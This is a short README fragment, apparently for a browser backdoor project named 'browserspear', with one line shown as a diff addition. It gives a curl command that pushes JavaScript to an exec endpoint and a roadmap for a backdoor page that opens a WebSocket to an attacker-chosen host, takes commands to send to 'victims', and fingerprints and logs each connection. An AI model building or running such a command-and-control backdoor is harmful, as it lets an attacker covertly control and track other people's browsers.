lvlrt/browserspear/README.md

 <pre>curl 'http://localhost:1337/exec?alert("muahahahaha")'</pre>

 # TODO & Roadmap
+- For testing, if the servers root is requested, return the backdoor.html file
 - backdoor must be built to only provide the URL to connect to if it was not already set. so that the url can be changed by adding an extra script-segment with "var socket = new WebSocket('ws://wereiwanttogo.com:1337')"
 - interface should take commands to be sent to victims.
 - a new connection should be fingerprinted and logged to a local file